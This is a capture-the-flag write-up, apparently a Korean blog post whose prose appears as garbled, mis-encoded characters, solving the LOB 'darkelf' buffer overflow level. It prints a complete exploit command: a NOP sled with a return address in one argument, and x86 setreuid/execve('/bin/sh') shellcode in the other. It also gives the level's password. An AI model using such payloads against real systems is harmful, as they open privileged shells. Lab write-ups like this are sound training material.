Wargame/CTF(Capture The Flag)

LOB darklf

๐“›๐“พ๐“ฌ๐“ฎ๐“ฝ๐“ฎ_๐“ข๐“ฝ๐“ฎ๐“ต๐“ต๐“ช 2015. 9. 15.
728x90
๋ฐ˜์‘ํ˜•


์†Œ์Šค๋ฅผ ์—ด์–ด๋ณด๋ฉด ์ผ๋‹จ ์ „๋ฌธ์ œ๋ž‘ ๋น„์Šทํ•œ๋ฐ ๊ธธ์ด๋ฅผ ์ฒดํฌํ•œ๋‹ค.

์ฒซ๋ฒˆ์งธ์ธ์ž ๊ฐ’์˜ ๊ธธ์ด๋ฅผ ํ™•์ธํ•˜์—ฌ 48๊ธ€์ž๋ณด๋‹ค ํฌ๋ฉด ๋‚˜์™€๋ฒ„๋ฆฌ๋Š” ๊ฒƒ์„ ํ™•์ธ ํ• ์ˆ˜ ์žˆ๋‹ค.


์ผ๋‹จ ์•ž๊ณผ ๋˜‘๊ฐ™์ด ์ง„ํ–‰ํ•˜๊ณ 


payload๋ฅผ ์ž‘์„ฑ๋•Œ 

./darkelf  $(python -c 'print "\x90"*40+"AAAA"+"\xcc\xfb\xff\xbf"') <= ์ฒซ๋ฒˆ์งธ ์ธ์ž(buffer+AAAA+ret์ฃผ์†Œ๊ฐ’)

 $(python -c 'print "\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')<=2๋ฒˆ์งธ์ธ์ž( NOP+์‰˜์ฝ”๋“œ)


password : kernel crashed



728x90
๋ฐ˜์‘ํ˜•

'Wargame > CTF(Capture The Flag)' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

pwnable.kr shellshock  (0) 2015.10.11
LOB orge  (0) 2015.09.15
LOB wolfman  (0) 2015.09.15
LOB orc  (0) 2015.09.15
LOB goblin  (0) 2015.09.15

๋Œ“๊ธ€